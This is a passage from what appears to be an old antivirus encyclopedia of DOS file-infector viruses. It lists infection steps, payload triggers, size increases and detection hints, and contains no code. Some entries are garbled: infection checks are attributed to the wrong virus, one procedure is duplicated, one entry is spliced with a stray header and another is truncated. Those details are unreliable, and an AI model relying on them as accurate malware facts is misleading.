  2858. 1) Doesn't stay resident in memory.
  2859. 2) ARCV-FRI doesn't hook INT 24h when infecting
  2860.    files. Error message occurs if there is an
  2861.    I/O error (such as write protect).
  2862.  
  2863. [Agent-B]
  2864. Virus Name: Agent-B
  2865. Virus Type: File Infector Virus
  2866.             (infects .EXE & .COM files)
  2867. Virus Length: 763 Bytes(COM & EXE)
  2868. PC Vectors Hooked: INT 24h
  2869. Executing Procedure:
  2870. 1) Searches for a .COM file in the current
  2871.    directory.
  2872. 2) Once it locates a file it checks whether it has
  2873.    been infected by Argent. If "Yes", it continues
  2874.    to look for any  uninfected .COM file.
  2875. 3) It will infect only two files at a time.
  2876. Damage:  None
  2877. Detecting Method:
  2878. 1) Infected files will increase by 763 bytes.
  2879. Note:
  2880. 1) Doesn't stay resident in memory.
  2881. 2) Argent hooks INT 24h when infecting files.
  2882.    Omits I/O error (such as write protect).
  2883.  
  2884. [Nanite]
  2885. Virus Name: Nanite
  2886. Virus Type: File Infector Virus
  2887.             (infects .EXE & .COM files)
  2888. Virus Length: No change
  2889. PC Vectors Hooked: None
  2890. Executing Procedure:
  2891. 1) Searches for a .COM or .EXE file in the current
  2892.    directory.
  2893. 2) Once it locates a file it checks whether it has
  2894.    been infected by Nanite. If "Yes", it continues
  2895.    to look for any  uninfected .COM or .EXE file.
  2896. 3) It will infect all .EXE and .COM files until
  2897.    all files in the current directory have been
  2898.    infected
  2899. Damage:
  2900. 1) Overwrites original files, so the length of
  2901.    infected file won't increase.
  2902. Note:
  2903. 1) Doesn't stay resident in memory.
  2904. 2) Nanite doesn't hook INT 24h when infecting
  2905.    files. Error message occurs if there is an I/O
  2906.    error (such as  write protect).
  2907.  
  2908. [Arcv-670]
  2909. Virus Name: Arcv-670
  2910. Virus Type: File Infector Virus
  2911.             (infects .COM files)
  2912. Virus Length: 670 Bytes(COM)
  2913. PC Vectors Hooked: None
  2914. Executing Procedure:
  2915. 1) Searches for a .COM file in the current
  2916.    directory.
  2917. 2) Once it locates a file it checks whether it has
  2918.    been infected by ARCV-670. If "Yes", it
  2919.    continues to look for any  uninfected .COM
  2920.    file.
  2921. 3) It will infect only one file at a time.
  2922. 4) It finally checks the system date If the date
  2923.    is between the 20th and 25th of December, and the
  2924.    year is larger than 1992, it will show the
  2925.    message: "Happy Xmas from the ARCV", then the system
  2926.    halts.
  2927. Damage:  If system date is between the 20th and
  2928.          25th of December and the year is larger than
  2929.          1992, this message shows on screen:
  2930.          "Happy Xmas from the ARCV",
  2931.          then the system halts.
  2932. Detecting Method:
  2933. 1) Infected files will increase by 670 Bytes.
  2934. Note:
  2935. 1) Doesn't stay resident in memory.
  2936. 2) ARCV-670 doesn't  hook INT 24h when infecting
  2937.    files. Error message occurs  if there is an
  2938.    I/O error  (such as write protect).
  2939.  
  2940. [Why]
  2941. Virus Name: Why
  2942. Virus Type: File Infector Virus
  2943.             (infects .COM files)
  2944. Virus Length: 457 Bytes(COM)
  2945. PC Vectors Hooked: None
  2946. Executing Procedure:
  2947. 1) Searches for a .COM file in the current
  2948.    directory.
  2949. 2) Once it locates a file it checks whether it has
  2950.    been infected by Why. If "Yes", it continues to
  2951.    look for any uninfected .COM file.
  2952. 3) It will infect only one file at a time.
  2953. 4) It then checks the system date. If the date is
  2954.    the 12th of May or the 25th of February, the
  2955.    virus will damage all files on the hard disk.
  2956. Damage:  If system date is May 12th or February
  2957.          25th, the virus will damage all files on
  2958.          the hard disk.
  2959. Detecting Method:
  2960. 1) Infected files will increase by 457 Bytes.
  2961. Note:
  2962. 1) Doesn't stay resident in memory.
  2963. 2) "Why" doesn't hook INT 24h when infecting
  2964.    files.  Error message occurs if there is an I/O
  2965.    error (such as write protect).
  2966.  
  2967. [FCB]
  2968. Virus Name: Fcb
  2969. Virus Type: File Infector Virus
  2970.             (infects .EXE & .COM files)
  2971. Virus Length: No change
  2972. PC Vectors Hooked: None
  2973. Executing Procedure:
  2974. 1) Searches for a .COM file in the current
  2975.    directory.
  2976. 2) Once it locates a file it checks whether it has
  2977.    been infected by FCB. If "Yes", it continues to
  2978.    look for any  uninfected .COM file.
  2979. 3) It will infect only one file at a time.
  2980. 4) Searches for a .EXE file in the current
  2981.    directory.
  2982. 5) Once it locates a file it checks whether it has
  2983.    been infected by FCB. If "Yes", it continues to
  2984.    look for any uninfected .EXE file.
  2985. 6) It will infect only one file at a time.
  2986. Damage:
  2987. 1) Overwrites original file, so the length of
  2988.    infected file won't increase.
  2989. Note:
  2990. 1) Doesn't stay resident in memory.
  2991. 2) FCB doesn't hook  INT 24h when infecting files.
  2992.    Error message occurs if there is an I/O error
  2993.    (such as write protect).
  2994.  
  2995. [Casper]
  2996. Virus Name: Casper
  2997. Virus Type: File Infector Virus
  2998.             (infects .COM files)
  2999. Virus Length: 1200 Bytes(COM)
  3000. PC Vectors Hooked: None
  3001. Executing Procedure:
  3002. 1) Checks whether the system date is the first of
  3003.    April, if "yes", then it formats the current
  3004.    disk,
  3005. 2) If "NO", then it searches for a *.C* file in
  3006.    the current directory.
  3007. 2) Once it locates a file it checks whether it
  3008.    has been infected by FCB. If "Yes", it
  3009.    continues to look for any  uninfected *.C*
  3010.    file.
  3011. 3) It will infect only one file at a time.
  3012. 4) It then executes the original file.
  3013. Damage:  If the system date is the 1st of April,
  3014.          then it formats the current disk.
  3015. Detecting Method:
  3016. 1) Infected files will increase by 1200 Bytes.
  3017. Note:
  3018. 1) Doesn't stay resident in memory.
  3019. 2) Casper doesn't hook INT 24h when infecting
  3020.    files. Error message occurs if there is an I/O
  3021.    error (such as  write protect).
  3022.  
  3023. $#Diogenes
  3024. Virus Name: Diogenes
  3025. Virus Type: File Infector Virus
  3026.             (infects .COM files)
  3027. Virus Length: 946 Bytes(COM)
  3028. PC Vectors Hooked: None
  3029. Executing Procedure:
  3030. 1) Checks whether the system date is the 31st. If
  3031.    "Yes", it damages all files on the  hard disk,
  3032.    then displays information on the screen:
  3033.    "DIOGENES 2.0 has visited your hard drive......
  3034.    This has been another fine product of the
  3035.    Lehigh Valley...Watch (out) for future
  3036.    'upgrades'.. ... The world's deceit has raped
  3037.    my soul. We melt the plastic people down, then
  3038.    we melt their plastic town.
  3039. 2) If "NO', then a  it searches for a .COM file in
  3040.    the current directory.
  3041. 2) Once it locates a file it checks whether it
  3042.    has been infected by Diogenes.  If "Yes", it
  3043.    continues to look for   any  uninfected .COM
  3044.    file.
  3045. 3) It will infect only one file at a time.
  3046. Damage:  If the system date is the 31st, then it
  3047.          damages all files on the hard disk.
  3048. Detecting Method:
  3049. 1) Infected files will increase by 946 Bytes.
  3050. Note:
  3051. 1) Doesn't stay resident in memory.
  3052. 2) Diogenes doesn't hook INT 24h when infecting
  3053.    files. Error message occurs if there is an
  3054.    I/O error (such as write protect).
  3055.  
  3056. [Brothers-2]
  3057. Virus Name: Brothers-2
  3058. Virus Type: File Infector Virus
  3059.             (infects .COM files)
  3060. Virus Length: 693 Bytes(COM)
  3061. PC Vectors Hooked: None
  3062. Executing Procedure:
  3063. 1) Checks whether the system date is between the
  3064.    11th and 25th of November or December. If "Yes",
  3065.    it shows the message: "Brotherhood... I am seeking
  3066.    my brothers "DEICIDE" and "MORGOTH", then
  3067.    execute original file.
  3068. 2) If "NO', then  it searches for a .COM file in
  3069.    the current directory.
  3070. 2) Once it locates a file it checks whether it has
  3071.    been infected by Brothers-2. If "Yes", it
  3072.    continues to look for any uninfected .COM file.
  3073. 3) It will check whether the second word of the
  3074.    .COM file is "0xADDE", if "yes", it will show
  3075.    such message: "Found my brother MORGOTH!!!."
  3076.    then execute original file.
  3077. 4) It will also check whether the second word of
  3078.    the .COM file is "0x0D90", if "yes", it will
  3079.    show such message: 'Found my brother "DEIGOTH"
  3080.    !!!. then execute original file.
  3081. 5) If "NO", then it will infect .COM files one at
  3082.    a time.
  3083. 6)It will execute original file.
  3084. Damage:  None
  3085. Detecting Method:
  3086. 1) Infected files will increase by 693 Bytes.
  3087. Note:
  3088. 1) Doesn't stay resident in memory.
  3089. 2) Brothers-2 doesn't hook INT 24h when infecting
  3090.    files. Error message occurs if there is an I/O
  3091.    error (such as write protect).
  3092.  
  3093. [Mindless]
  3094. Virus Name: Mindless
  3095. Virus Type: File Infector Virus
  3096.             (infects .COM files)
  3097. Virus Length: No change
  3098. PC Vectors Hooked: None
  3099. Executing Procedure:
  3100. 1) Checks whether the system date is Sunday. If
  3101.    "yes", it damages all files on the hard disk.
  3102. 2) If  "NO', then it searches for a *.C* file in
  3103.    the current directory.
  3104. 2) Once it locates a file it infects it and
  3105.    continues searching until it infects all the
  3106.    *.C* files in the current directory.
  3107. Damage:
  3108. 1) If the system date is Sunday, it damages all
  3109.    the files on the hard disk.
  3110. 2) Overwrites original files, so the length of
  3111.    infected files won't increase.
  3112. Detecting Method:  None.
  3113. Note:
  3114. 1) Doesn't stay resident in memory.
  3115. 2) Mindless doesn't hook INT 24h when infecting
  3116.    files. Error message occurs if there is an
  3117.    I/O error (such as write protect).
  3118.  
  3119. [Acme]
  3120. Virus Name: Acme
  3121. Virus Type: File Infector Virus (Companion Virus)
  3122. Virus Length: 932 Bytes
  3123. PC Vectors Hooked: None
  3124. Executing Procedure:
  3125. 1) Checks whether the system time is after 4
  3126.    o'clock in the afternoon. If "Yes", a sound is
  3127.    made, then the system halts.
  3128. 2) If "NO', then it searches for an .EXE file in
  3129.    the current directory.
  3130. 3) It will then create a 923 bytes, "hidden &
  3131.    read-only" .COM file with the .EXE file's name.
  3132. Damage: If the system time is after 4 o'clock in
  3133.         the afternoon, a sound is made, then
  3134.         the system halts.
  3135. Detecting Method:
  3136. 1) Check whether there are "hidden" .COM files
  3137.    with 923 bytes.
  3138. Note:
  3139. 1) Doesn't stay resident in memory.
  3140. 2) ACME doesn't hook INT 24h when infecting files.
  3141.    Error message occurs if there is an I/O error
  3142.    (such as write protect).
  3143.  
  3144. [Dest1]
  3145. Virus Name: DEST1
  3146. Virus Type: File Infector Virus
  3147.             (only infects .COM files).
  3148. Virus Length: 323 Bytes
  3149. PC Vectors Hooked: INT 24h
  3150. Executing Procedure:
  3151. 1) Searches for a COM file in the current
  3152.    directory.
  3153. 2) It checks whether it has  been infected by
  3154.    Dest1. If "Yes", it continues to look for an
  3155.    uninfected .COM file.
  3156. 3) It then infects any uninfected .COM file, one
  3157.    file at a time).
  3158. 4) Finally it executes the original file.
  3159. Damage:  None
  3160. Detecting Method: Infected files will increase
  3161.                   by 323 Bytes.
  3162. Note:
  3163. 1) Doesn't stay resident in memory.
  3164. 2) Dest1 hooks INT 24h when infecting files. Omits
  3165.    I/O error (such as write protect).
  3166.  
  3167. [Dest2]
  3168. Virus Name: DEST2
  3169. Virus Type: File Infector Virus
  3170.             (infects .COM files only)
  3171. Virus Length: 478 Bytes
  3172. PC Vectors Hooked: INT 24h
  3173. Executing Procedure:
  3174. 1) Searches for a COM file in the current
  3175.    directory.
  3176. 2) It checks whether it has  been infected by
  3177.    Dest2. If "Yes", it continues to look for an
  3178.    uninfected .COM file.
  3179. 3) It then infects the .COM file. It finally
  3180.    executes the original file.
  3181. Damage:  If kill-flag=-1, then deletes a file.
  3182. Detecting Method:  Infected files will increase
  3183.                    by 478 Bytes.
  3184. Note:
  3185. 1) Doesn't stay resident in memory.
  3186. 2) Dest2 hook INT 24h when infecting files. Omits
  3187.    an I/O error (such as write protect).
  3188.  
  3189. [Cyber101]
  3190. Virus Name: CYBER101
  3191. Virus Type: File Infector Virus
  3192.             (infects .COM & .EXE files)
  3193. Virus Length: 946 Bytes(COM & EXE)
  3194. PC Vectors Hooked: INT 24h
  3195. Executing Procedure:
  3196. 1) The virus searches for a .COM or .EXE file in
  3197.    the current directory.
  3198. 2) It checks whether it has been infected by
  3199.    Cyber101. If "Yes", it continues to look for an
  3200.    uninfected .COM & .EXE files.
  3201. 3) It then infects any .COM or .EXE files in  the
  3202.    current directory two at a time.
  3203. 4) Finally it executes the original file.
  3204. Damage:  None
  3205. Detecting Method:  Infected files will increase
  3206.                    by 946 Bytes.
  3207. Note:
  3208. 1) Doesn't stay resident in memory.
  3209. 2) Cyber101 hooks INT 24h when infecting files.
  3210.    Omit I/O error (such as write protect).
  3211.  
  3212. [Cyber]
  3213. Virus Name: CYBER
  3214. Virus Type: File Infector Virus
  3215.             (infects .COM & .EXE files)
  3216. Virus Length: 1092 Bytes(COM & EXE)
  3217. PC Vectors Hooked: INT 24h
  3218. Executing Procedure:
  3219. 1) The virus searches for a .COM or .EXE file in
  3220.    the current directory.
  3221. 2) It checks whether it has been infected by
  3222.    Cyber. If "Yes", it continues to look for an
  3223.    uninfected .COM & .EXE files.
  3224. 3) It then infects any .COM or .EXE file in the
  3225.    current directory two at a time.
  3226. 4) Finally it executes the original file.
  3227. Damage:  None
  3228. Detecting Method:  Infected files will increase
  3229.                    by 1092 Bytes.
  3230. Note:
  3231. 1) Doesn't stay resident in memory.
  3232. 2) Cyber hooks INT 24h when infecting files. Omits
  3233.    I/O error (such as write protect).
  3234.  
  3235. [7thson-2]
  3236. Virus Name: 7THSON-2
  3237. Virus Type: File Infector Virus
  3238.             (infects .COM files)
  3239. Virus Length: 284 or 332 or 350 Bytes(COM)
  3240. PC Vectors Hooked: INT 24h
  3241. Executing Procedure:
  3242. 1) The virus searches for a .COM file in the
  3243.    current directory.
  3244. 2) It checks whether it has been infected by
  3245.    7thson-2. If "Yes", it continues to look for an
  3246.    uninfected files.
  3247. 3) It then infects all .COM files in the current
  3248.    directory.
  3249. 4) Finally it executes the original file.
  3250. Damage:  None
  3251. Detecting Method:
  3252. Infected files will increase by 284 or 332 or 350
  3253. Bytes.
  3254. Note:
  3255. 1) Doesn't stay resident in memory.
  3256. 2) 7thson-2 hooks INT 24h when infecting files.
  3257.    Omits I/O error (such as write protect).
  3258.  
  3259. [Bamestra]
  3260. Virus Name: BAMESTRA
  3261. Virus Type: File Infector Virus
  3262.             (infects .EXE files)
  3263. Virus Length: 530 Bytes(EXE)
  3264. PC Vectors Hooked: INT 24h
  3265. Executing Procedure:
  3266. 1) The virus searches for an .EXE file in the
  3267.    current directory.
  3268. 2) It checks whether it has been infected by
  3269.    Bamestra. If "Yes", it continues to look for an
  3270.    uninfected .EXE file.
  3271. 3) It then infects any .EXE  file in the current
  3272.    directory two at a time.
  3273. 4) Finally it executes the original file.
  3274. Damage:  None
  3275. Detecting Method:
  3276. 1) Infected files will increase by 530 Bytes.
  3277. Note:
  3278. 1) Doesn't stay resident in memory.
  3279. 2) Bamestra hooks INT 24h when infecting files.
  3280.    Omits an I/O error (such as write protect).
  3281.  
  3282. [Abraxas]
  3283. Virus Name: ABRAXAS
  3284. Virus Type: File Infector Virus
  3285.             (infects .COM & .EXE files)
  3286. Virus Length: 546 Bytes(COM & EXE)
  3287. PC Vectors Hooked: INT 24h
  3288. Executing Procedure:
  3289. 1) The virus searches for an .EXE or .COM file in
  3290.    the current directory.
  3291. 2) It checks whether it has been infected by
  3292.    Abraxas.  If "Yes", it continues to look for
  3293.    an uninfected .EXE or .COM file.
  3294. 3) It then infects all .EXE & .COM files in the
  3295.    current directory.
  3296. 4) Finally it executes the original file.
  3297. Damage:  None
  3298. Detecting Method:  Infected files will increase
  3299.                    by 546 Bytes.
  3300. Note:
  3301. 1) Doesn't stay resident in memory.
  3302. 2) Abraxas hooks INT 24h when infecting files.
  3303.    Omits an I/O error (such as write protect).
  3304.  
  3305. [MPC-1]
  3306. Virus Name: MPC-1
  3307. Virus Type: File Infector Virus
  3308.             (infects .COM & .EXE files)
  3309. Virus Length: 641 Bytes(COM & EXE)
  3310. PC Vectors Hooked: INT 24h
  3311. Executing Procedure:
  3312. 1) The virus searches for an .EXE or .COM file in
  3313.    the current directory.
  3314. 2) It checks whether it has been infected by
  3315.    MPC-1.  If "Yes", it continues to look for an
  3316.    uninfected .EXE or .COM file.
  3317. 3) It then infects all .EXE & .COM files in the
  3318.    current directory.
  3319. 4) Finally it executes the original file.
  3320. Executing Procedure:
  3321. 1) Search for a COM & EXE file in current
  3322.    directory.
  3323. 2) Check whether it has been infected by If "Yes",
  3324.    continue to look for a uninfected COM & EXE
  3325.    file.
  3326. 3) Infects the file until all files in the
  3327.    directory have been infected.
  3328. 4) Execute original file.
  3329. Damage:  None
  3330. Detecting Method:
  3331. 1) Infected files will increase by 641 Bytes.
  3332. Note:
  3333. 1) Doesn't stay resident in memory.
  3334. 2) MPC-1 hooks INT 24h when infecting files. Omits
  3335.    an I/O error (such as write protect).
  3336.  
  3337. [Zeppelin]
  3338. Virus Name: ZEPPELIN
  3339. Virus Type: File Infector Virus
  3340.             (infects .COM & .EXE files)
  3341. Virus Length: 1508 Bytes(COM & EXE)
  3342. PC Vectors Hooked: INT 24h
  3343. Executing Procedure:
  3344. 1) The virus searches for an .EXE or .COM file in
  3345.    the current directory.
  3346. 2) It checks whether it has been infected by
  3347.    Abraxas. If "Yes", it continues to look for an
  3348.    uninfected .EXE or .COM file.
  3349. 3) It then infects any .EXE & .COM files in the
  3350.    current directory four at a time.
  3351. 4) Finally it displays many uncertain codes, and
  3352.    sounds are made at the same time, then the
  3353.    system halts.
  3354. Damage: Shows a lot of codes, and makes strange
  3355.         sounds at the same time, then the system
  3356.         halts.
  3357. Detecting Method:
  3358. 1) Infected files will increase by 1508 Bytes.
  3359. 2) A lot of codes appear on the screen.
  3360. Note:
  3361. 1) Doesn't stay resident in memory.
  3362. 2) Zeppelin hooks INT 24h when infecting files.
  3363.    Omits an I/O error (such as write protect).
  3364.  
  3365. [Crumble]
  3366. Virus Name: CRUMBLE
  3367. Virus Type: File Infector Virus
  3368.             (infects .COM & .EXE files)
  3369. Virus Length: 778 Bytes(COM & EXE)
  3370. PC Vectors Hooked: INT 24h
  3371. Executing Procedure:
  3372. 1) The virus searches for an .EXE or .COM file in
  3373.    the current directory.
  3374. 2) It checks whether it has been infected by
  3375.    Crumble. If "Yes", it continues to look for an
  3376.    uninfected .EXE or .COM file.
  3377. 3) It then infects any .EXE & .COM files in the
  3378.    current directory two files at a time.
  3379. 4) Finally it checks the system date, if it is
  3380.    Friday, the message "falling letter" occurs on
  3381.    screen, then a letter falls every 5 seconds on
  3382.    the screen.
  3383. Damage:  If it is Friday, system will run
  3384.          "falling letter".
  3385. Detecting Method:  Infected files will increase by
  3386.                    778 Bytes.
  3387. Note:
  3388. 1) Doesn't stay resident in memory.
  3389. 2) Crumble hooks INT 24h when infecting files.
  3390.    Omits an I/O  error (such as write protect).
  3391.  
  3392. [COL-MAC]
  3393. Virus Name: COL_MAC
  3394. Virus Type: File Infector Virus
  3395.             (infects .COM & .EXE files)
  3396. Virus Length: 1022 Bytes(COM & EXE)
  3397. PC Vectors Hooked: INT 24h
  3398. Executing Procedure:
  3399. 1) The virus searches for an .EXE or .COM file in
  3400.    the current directory.
  3401. 2) It checks whether it has been infected by
  3402.    COL_MAC. If "Yes", it continues to look for an
  3403.    uninfected .EXE or .COM file.
  3404. 3) It then infects any two .EXE & .COM files in
  3405.    the current directory.
  3406. 4) Finally it shows a lot of random letters on the
  3407.    screen until the ENTER key is pressed.
  3408. Damage:  None
  3409. Detecting Method:  Infected files will increase
  3410.                    by 1022 Bytes.
  3411. Note:
  3412. 1) Doesn't stay resident in memory.
  3413. 2) COL_MAC hooks INT 24h when infecting files.
  3414.    Omits an I/O error (such as write protect).
  3415.  
  3416. [Galileo]
  3417. Virus Name: GALILEO
  3418. Virus Type: File Infector Virus
  3419.             (infects .COM & .EXE files)
  3420. Virus Length: 760 Bytes(COM & EXE)
  3421. PC Vectors Hooked: INT 24h
  3422. Executing Procedure:
  3423. 1) Checks whether system date is Monday, if
  3424.    "Yes", the virus will damage all files on the
  3425.    hard disk.
  3426. 2) It searches for a .COM or .EXE file in current
  3427.    directory.
  3428. 3) It then infects all .COM & .EXE files in the
  3429.    current directory.
  3430. Damage: If it is Monday, the virus will damage
  3431.         all files on the hard disk.
  3432. Detecting Method:  Infected files will increase
  3433.                    by 760 Bytes.
  3434. Note:
  3435. 1) Doesn't stay resident in memory.
  3436. 2) Galileo hooks INT 24h when infecting files.
  3437.    Omits on I/O  error (such as write protect).
  3438.  
  3439. [Wharps]
  3440. Virus Name: WHARPS
  3441. Virus Type: File Infector Virus
  3442.             (infects .COM files)
  3443. Virus Length: 572 Bytes(COM)
  3444. PC Vectors Hooked: INT 24h
  3445. Executing Procedure:
  3446. 1) The virus checks whether the system time is 3
  3447.    o'clock in the morning, if "Yes", a message
  3448.    appears on the screen: "wHaRpS! It is 3:00 a.m.
  3449.    > ETERNAL".
  3450. 2) It searches for a .COM file in the current
  3451.    directory.
  3452. 3) It then checks whether it has been infected by
  3453.    Wharps.  If "Yes", it continues to look for an
  3454.    uninfected .COM file, infecting each file one
  3455.    at a time.
  3456. 5) Finally it executes the original file.
  3457. Damage:  Infected file can't be executed.
  3458. Detecting Method:  Infected files will increase
  3459.                    by 572 Bytes.
  3460. Note:
  3461. 1) Doesn't stay resident in memory.
  3462. 2) Wharps hooks INT 24h when infecting files.
  3463.    Omits an I/O error (such as write protect).
  3464.  
  3465. [Bubbles-2]
  3466. Virus Name: BUBBLES-2
  3467. Virus Type: File Infector Virus
  3468.             (infects .COM & .EXE files)
  3469. Virus Length: 927 Bytes(COM & EXE)
  3470. PC Vectors Hooked: INT 24h
  3471. Executing Procedure:
  3472. 1) The virus searches for an .EXE or .COM file in
  3473.    the current directory.
  3474. 2) It checks whether it has been infected by
  3475.    Bubbles-2.  If "Yes", it continues to look for
  3476.    an uninfected .EXE or .COM file.
  3477. 3) It then infects all .EXE & .COM files in the
  3478.    current directory.
  3479. 4) It finally checks whether the system date is
  3480.    the 13th and year is not smaller than 1993, then
  3481.    it displays information on the screen:
  3482.    "Bubbles 2 : Its back and better then ever.  Is
  3483.    it me or does that make no sense at all?
  3484.  
  3485. [IVP]
  3486. Damage:  Infected files can't be executed.
  3487. Detecting Method:
  3488. Infected files will increase by 927 Bytes.
  3489. Note:
  3490. 1) Doesn't stay resident in memory.
  3491. 2) Bubbles-2 hooks INT 24h when infecting files.
  3492.    Omits an I/O error (such as write protect).
  3493.  
  3494. [Cybertech]
  3495. Virus Name: CYBERTECH
  3496. Virus Type: File Infector Virus
  3497.             (infects .COM files)
  3498. Virus Length: 1076 Bytes(COM)
  3499. PC Vectors Hooked: INT 24h
  3500. Executing Procedure:
  3501. 1) It checks whether the system date is smaller
  3502.    than 1993. If "Yes", then the virus searches
  3503.    for a .COM file in the current directory.
  3504. 2) It checks whether it has been infected by
  3505.    Cybertech.  If "Yes", it continues to look for
  3506.    an uninfected .COM file.
  3507. 3) It then infects any .COM file in the current
  3508.    directory one at a  time.
  3509. 4) If "no", then information appears on the
  3510.    screen: "The previous year you have been
  3511.    infected by a virus without knowing or
  3512.    removing it. To be gentle to you I decided to
  3513.    remove myself from your system . I suggest you
  3514.    better buy VirusScan of McAfee to ensure yourself
  3515.    complete security of your precious data. Next
  3516.    time you could be infected with a malevolent
  3517.    virus. May I say goodbye to you for now..
  3518.    CyberTech Virus-Strain A  (c) 1992 John Tardy
  3519.    of Trident". It finally restores the current
  3520.    file as before.
  3521. Damage:  None
  3522. Detecting Method:
  3523. Infected files will increase by 1076 Bytes.
  3524. Note:
  3525. 1) Doesn't stay resident in memory.
  3526. 2) Cybertech hooks INT 24h when infecting files.
  3527.    Omits an I/O error (such as write protect).
  3528.  
  3529. [Crazy]
  3530. Virus Name: CRAZY
  3531. Virus Type: Boot Strap Sector Virus
  3532. Virus Length:  4006 Bytes
  3533. PC Vectors Hooked: None
  3534. Executing Procedure:
  3535. This virus infects no file, partition or boot
  3536. sector.  When it is   executed, it will create 50
  3537. subdirectories, 50 subdirectories are created in
  3538. every subdirectory.
  3539. Damage:  None
  3540. Detecting Method:  None.
  3541. Note:
  3542. 1) Doesn't stay resident in memory.
  3543. 2) Crazy doesn't hook INT 24h when infecting
  3544.    files. An error message occurs if there is an
  3545.    I/O error (such as write protect).
  3546.  
  3547. [Burger_560-8]
  3548. Virus Name: BURGER_560-8
  3549. Virus Type: File Infector Virus
  3550.             (infects .COM files)
  3551. Virus Length: No change
  3552. PC Vectors Hooked: None
  3553. Executing Procedure:
  3554. 1) Searches for a .COM file in "A:".
  3555. 2) It checks whether it has been infected by
  3556.    Burger_560-8. If "Yes", it continues to look
  3557.    for an uninfected  .COM file.
  3558. 3) It then infects an uninfected file one at a
  3559.    time.
  3560. 4) If no .COM file is infected, it will continue
  3561.    to look for an .EXE file in "A:".
  3562. 5) It finally rename the .EXE file to .COM , then
  3563.    it infects the .COM file.
  3564. Damage:
  3565. Overwrites the original file, so the length of
  3566. infected file won't increase.
  3567. Detecting Method:
  3568. 1) Changes .EXE file into a .COM file
  3569. Note:
  3570. 1) Doesn't stay resident in memory.
  3571. 2) Burger_560-8 don't hooks INT 24h when infecting
  3572.    files. Error message occurs if there is an I/O
  3573.    error (such as write protect).
  3574.  
  3575. [Boys]
  3576. Virus Name: BOYS
  3577. Virus Type: File Infector Virus
  3578.             (infects .COM files)
  3579. Virus Length: 500 Bytes(COM)
  3580. PC Vectors Hooked: None
  3581. Executing Procedure:
  3582. 1) It searches for an .EXE file, it then changes
  3583.    the attributes into "SYSTEM".
  3584. 2) It searches for a .COM file in the current
  3585.    directory.
  3586. 3) It then checks whether it has been infected
  3587.    by Boys. If "Yes", it continues to look for an
  3588.    uninfected .COM file.
  3589. 4) It infects only an uninfected file at one time,
  3590.    and changes the attribute into  "READ-ONLY".
  3591. 5) Finally it executes the original file.
  3592. Damage:  None.
  3593. Detecting Method:
  3594. Infected files will increase by 500 Bytes.
  3595. Note:
  3596. 1) Doesn't stay resident in memory.
  3597. 2) Boys doesn't hook INT 24h when infecting files.
  3598.    An error message occurs if there is an I/O
  3599.    error (such as write protect).
  3600.  
  3601. [Null]
  3602. Virus Name: NULL
  3603. Virus Type: File Infector Virus
  3604.             (infects .COM files)
  3605. Virus Length: 733 Bytes(COM)
  3606. PC Vectors Hooked: None
  3607. Executing Procedure:
  3608. 1) It first decodes.
  3609. 2) Then it searches for a .COM file in the
  3610.    current directory.
  3611. 3) It checks whether it has  been infected by
  3612.    Null. If "Yes", it continues to look for an
  3613.    uninfected .COM file.
  3614. 4) It infects only one file at a time.
  3615. 5) It then executes  the original file.
  3616. 6) If it can not infect a .COM file, then it
  3617.    checks whether the DAY =30. If "yes", it
  3618.    destroys all the data on the disk, then
  3619.    shows the message: "Your disk is dead! Long
  3620.    life Doomsday 1.0 "
  3621. Damage:
  3622. IF DAY = 30 , then destroy all data on current
  3623. disk.
  3624. Detecting Method:
  3625. Infected files will increase by 733 Bytes.
  3626. Note:
  3627. 1) Doesn't stay resident in memory.
  3628. 2) Null doesn't hook INT 24h when infecting
  3629.    files. An error message occurs if there is an
  3630.    I/O error (such as write protect).
  3631.  
  3632. [Vienna-11]
  3633. Virus Name: VIENNA-11
  3634. Virus Type: File Infector Virus
  3635.             (infects .COM files)
  3636. Virus Length: 943 Bytes(COM)
  3637. PC Vectors Hooked: None
  3638. Executing Procedure:
  3639. 1) Checks whether the system s clock seconds are
  3640.    equal to SECOND=.0004, If "Yes", then a message
  3641.    will appear on the screen: "Sorry this computer
  3642.    is no longer operational due to an outbreak of
  3643.    Bush is hero,  Have a Nice day. . . "
  3644. 2) Next it will check as to whether the time is
  3645.    equal to TIME = 7:45 on 24th of March If "Yes",
  3646.    then a message will appear on the screen:
  3647.    "VIPERizer, Strain B (c) 1992, Stin gray/VIPER
  3648.    Happy Valentines Day !"  It then destroys all
  3649.    the data on all of the disks including the hard
  3650.    disk.
  3651. 3) If "No", then it searches for a .COM file in
  3652.    the current directory.
  3653. 4) Checks whether it has been infected by
  3654.    Vienna-11. If "Yes", it continues to look for
  3655.    a uninfected .COM file.
  3656. 5) Then infects only one file at a time,
  3657.    afterwards it executes  the original file.
  3658. Damage:
  3659. Destroys all of the data on all of the disks.
  3660. Detecting Method:
  3661. Infected files will increase by 943 Bytes.
  3662. Note:
  3663. 1) Doesn't stay resident in memory.
  3664. 2) Vienna-11 doesn't hook INT 24h when infecting
  3665.    files. An error message occurs if there is an
  3666.    I/O error (such as write protect).
  3667.  
  3668. [Intrud-B]
  3669. Virus Name: INTRUD-B
  3670. Virus Type: File Infector Virus
  3671.             (infects .EXE files)
  3672. Virus Length: 1225 Bytes(EXE)
  3673. PC Vectors Hooked: None
  3674. Executing Procedure:
  3675. 1) Search for an .EXE file in the current
  3676.    directory.
  3677. 2) It checks whether it has  been infected by
  3678.    Intrud-B. If "Yes", it continues to look for a
  3679.    uninfected .EXE file.
  3680. 3) It then infects only one file at a time.
  3681. 4) Following it executes the original file.
  3682. Damage:  None.
  3683. Detecting Method:
  3684. 1)Infected files will increase by 1225 Bytes.
  3685. Note:
  3686. 1) Doesn't stay resident in memory.
  3687. 2) Intrud-B doesn't hook INT 24h when infecting
  3688.    files.  An error message occurs if there is  an
  3689.    I/O error (such as write protect).
  3690.  
  3691. [New-s]
  3692. Virus Name: NEW-S
  3693. Virus Type: File Infector Virus
  3694.             (infects .EXE files)
  3695. Virus Length: 1214 Bytes
  3696. PC Vectors Hooked: None
  3697. Executing Procedure:
  3698. 1) First shows a strange figure on the screen
  3699.    (with music).
  3700. 2) Then searches for an EXE file in the current
  3701.    directory.  It then creates a file of the same
  3702.    name with the length of 1214 bytes and
  3703.    overwrites the  original file.  The new file is
  3704.    New-S.
  3705. 3) Finally it overwrites the COMMAND.COM in the
  3706.    root directory and copies the overwritten file
  3707.    to the root directory.
  3708. Damage:  Overwrites original file
  3709. Detecting Method:
  3710. Infected files will increase by 1214 Bytes.
  3711. Note:
  3712. 1) Doesn't stay resident in memory.
  3713. 2) NEW-S doesn't hook INT 24h when infecting
  3714.    files.  An error message occurs if there is an
